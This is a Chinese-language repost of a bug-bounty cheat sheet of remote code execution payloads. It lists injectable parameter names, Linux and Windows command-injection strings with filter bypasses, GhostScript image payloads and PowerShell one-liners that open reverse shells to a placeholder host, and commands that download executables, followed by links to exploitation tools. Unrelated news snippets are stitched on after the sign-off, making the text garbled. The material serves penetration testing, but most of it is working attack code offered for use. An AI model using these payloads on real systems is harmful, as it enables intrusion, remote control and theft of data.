干货漏洞挖掘中RCE漏洞常用的Payload总结
RCE:远程代码执行 (RCE) 使攻击者能够通过 注入攻击 执行恶意代码。代码注入攻击不同于 命令注入 攻击。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码评估可能导致易受攻击的 Web 应用程序和 Web 服务器的全面妥协. 需要注意的是,几乎每种编程语言都有代码评估功能。
如何寻找 RCE:
Top 46 RCE 参数 : exec={payload} command={payload} execute{payload} ping={payload} include={payload} exclude={payload} jump={payload} code={payload} reg={payload} do={payload} func={payload} arg={payload} option={payload} load={payload} process={payload} step={payload} read={payload} function={payload} req={payload} feature={payload} exe={payload} module={payload} payload={payload} run={payload} print={payload} email={payload} id={payload} username={payload} user={payload} to={payload} from={payload} search={payload} query={payload} q={payload} s={payload} shopId={payload} blogId={payload} phone={payload} mode={payload} next={payload} firstname={payload} lastname={payload} locale={payload} cmd={payload} sys={payload} system={payload}
Linux RCE
Payload list: id ,id ;id ;id; "id" "id" ""id ""id"" ""id""& *id *id* **id** (id) `id` `id`& `id` & ;id| ;|id| |id |id| ||id ||id| ||id; |id; &id &id& &&id &&id&& ^id system("cat /etc/passwd"); <?php system("cat /etc/passwd");?> php -r "var_dump(exec("id"));" /bin$u/bash$u cat$u+/etc$u/passwd$u ";cat+/etc/passwd+# ;+$u+cat+/etc$u/passwd$u ;+$u+cat+/etc$u/passwd+# /???/??t+/???/??ss?? /?in/cat+/et?/passw? ;+cat+/e"tc/pass"wd cat+/etc/passwd cat /etc$u/passwd (sy.(st).em)(whoami); ;cat+/etc/passwd ;cat+/etc/passwd+# ;cat$u+/etc$u/passwd$u ;cat%20/etc/passwd ;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd ;cat$u /etc$u/passwd$u ;{cat,/etc/passwd} ;cat /dev/tcp/yourip/yourport 0<&1 2>&1" pop graphic-context pop graphic-context 3. %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops 4. %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") currentdevice putdeviceprops
保存poc.xml: <?xml version="1.0" standalone="no"?>
GhostScript Rce:nc -nvlp 1337
保存 test.gif or test.jpg 1. %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") currentdevice putdeviceprops 2. %!PS 0 1 300367 {} for {save restore} stopped {} if (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") (w) file 3. %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") currentdevice putdeviceprops 4. %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops保存 poc.pdf%!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator) .putdeviceparams quit
下面这个github项目最适合在上传功能上查找 Rce 错误
https://github.com/modzero/mod0BurpUploadScanner.git
PHPGGC:PHP 通用小工具链:
该工具允许您生成payload,而无需执行查找小工具和组合它们的繁琐步骤。它可以看作是frohoff 的 ysoserial的等价物,但对于 PHP。目前,该工具支持的小工具链包括:CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、Slim、SwiftMailer、Symfony、Wordpress、Yii 和 ZendFramework
这个最适合查找 rce漏洞(框架/库):
https://github.com/ambionics/phpggc
Windows RCE
Payload list: ".system("dir")." " dir " || dir " & dir " && dir "; dir " dir " || dir " | dir " & dir " && dir "; dir dir $(`dir`) &&dir | dir C: ; dir C: & dir C: && dir C: dir C: | dir ; dir & dir && dir| ipconfig /all ; ipconfig /all & ipconfig /all && ipconfig /all ipconfig /all|| phpinfo() | phpinfo() {${phpinfo()}} ;phpinfo() ;phpinfo();// ";phpinfo();// {${phpinfo()}} & phpinfo() && phpinfo() phpinfo() phpinfo();转义所有危险字符时的RCE payload:%27%20dir %27%20%7C%7C%20dir %27%20%26%20dir %27%20%26%26%20dir %27%3B%20dir %22%20dir %22%20%7C%7C%20dir %22%20%7C%20dir %22%20%26%20dir %22%20%26%26%20dir %22%3B%20dir %22.system%28%27dir%27%29.%22 %24%28%60dir%60%29 %26%26dir %7C%20dir%20C%3A%5C %3B%20dir%20C%3A%5C %26%20dir%20C%3A%5C %26%26%20dir%20C%3A%5C dir%20C%3A%5C %7C%20dir %3B%20dir %26%20dir %26%26%20dir +dir+c:+| +|+dir+c:+| +|+dir+c:%2f+| dir+c: ||+dir|c: +|+Dir+c: +|+Dir+c:%255c +|+Dir+c:%2f $+|+Dir+c: $+|+Dir+c:%255c $+|+Dir+c:%2f %26%26+|+dir c: %0a+dir+c: %26%26+|+dir c:%2f $%26%26dir+c:%2f %0a+dir+c:%2f %0a+dir+c:%255c $%26%26dir c: %26%26+|+dir c:%255c $%26%26dir+c:%255c %20{${phpinfo()}}
反弹shell:
nc -nvlp 443 powershell -c "$client = New-Object System.Net.Sockets.TCPClient("your ip",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()" or powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip="your ip";$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq "$ps") -and ($ps -eq $false)){$ps=$true}if($item -like "?:"){$item="d:"}$myArray=@("cd","exit","d:","pwd","ls","ps","rm","cp","mv","cat");$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2="/c "+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt="PS " + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"反弹shell生成器:https://www.revshells.com文件下载:powershell -c "(new-object System.Net.WebClient).DownloadFile("https://eternallybored.org/misc/wget/1.21.1/64/wget.exe","C:UsersadminDesktopwget.exe")" powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe # also works in PS ConstrainLanguageMode
Rce(Unix 和 windows)的最佳 burpsuite 扩展:
https://github.com/ewilded/shelling
最佳的命令注入利用工具:
https://github.com/commixproject/commix
Happy Hacking!
文章转自HACK学习呀
文章来源:
https://ansar0047.medium.com/remote-code-execution-unix-and-windows-4ed3367158b3
交广会客厅春运旅途的暖心微服务2月7日,太原客运段运京车队担当乘务的运城站至北京丰台站K604次旅客列车上,乘务员张萌在车厢内巡视时,突然听到一阵叮铃哐啷的声音,寻声一看,原来是一位女旅客包破了,东西洒落一地。
中证财富夜读投资需要一些钝感力近期,市场热点迭出,比如ChatGPT的爆火出圈,不仅在社交平台刷屏,相关概念股更是受到资本的追捧。面对层出不穷的热点,部分投资者想依靠短期博弈来获取利益,但有时往往欲速则不达。面
奇瑞星途瑶光正式上市,好产品加上好价格,还能叫好又叫座?2月21日,在上海外滩电竞文化中心,奇瑞汽车的高端品牌星途汽车,在这里举行了星途汽车的全新重磅车型星途瑶光的上市发布会。星途瑶光从正式亮相,并开启盲订之后,市场关注度一直很高,截至
湖南省供销合作总社第四届监事会第五次全体会议在长召开2月17日,湖南省供销合作总社第四届监事会第五次全体会议在长沙召开。红网时刻新闻2月17日讯(记者邵佳丽通讯员田野)2月17日,湖南省供销合作总社第四届监事会第五次全体会议在长沙召
你消费,我护航!今年315湖南将做这九件事315国际消费者权益日即将来临,湖南省市场监督管理局省消费者权益保护委员会将组织开展2023年315国际消费者权益日系列活动。此次活动主题为优化消费环境提振消费信心。活动期间,将举
农心杯柯洁半目负朴廷桓仅剩主将辜梓豪攻擂今天下午进行的第24届农心杯世界围棋团体赛中,中国队副帅柯洁攻擂挑战韩国朴廷桓,结果柯洁执黑半目告负。这样,朴廷桓取得两连胜,明天中国队仅剩的主将辜梓豪将上台攻擂。图说柯洁中国围棋
今年iPhone出货量会下滑?瑞银苹果手机表现或落后于安卓财联社2月21日讯(编辑周子意)据媒体周二(21日)报道,瑞银分析师预估,苹果iPhone今年的出货量料将同比下滑,这将是4年来其年度表现首次落后于竞争对手安卓手机。瑞银分析师团队
与林为伴以山为家在广西元宝山国家级自然保护区,罗定明(右一)和同事在巡护路上涉水而行。罗定明(右)和同事在巡护途中用望远镜查看情况。罗定明手捧叶子,观察元宝山冷杉野外回归生长情况。初春时节,广西融
科创新视点亮风台一揽子交付模式促AR落地链主或推动行业乘法效应南方财经全媒体记者江月上海报道对AR(增强现实)落地方式的探索,犹如撰写一部科幻小说一般需要想象力。眼下,AR公司正以形态各异之姿出现在市场上,其中承担一揽子交付服务的公司角色令人
朱熹与地方志朱熹像朱熹是中国古代著名的哲学家教育家,宋朝理学之集大成者,被后人尊称为朱子。他好学深思,涉猎广泛,在众多领域都取得了杰出的成就。朱熹与地方志也有不少交集,他非常重视发挥志书的功能
足协烧起三把火,领导班子遭遇信任危机!孙雯高洪波离任倒计时自从陈戌源落马,包括谁来接陈戌源的班等疑问,就备受各方的关注。而目前负责主要领导工作的杜兆才,在足协内部烧起了三把火!第一把火是明确表达了对监察机关调查陈戌源的拥护,足协跟陈戌源刘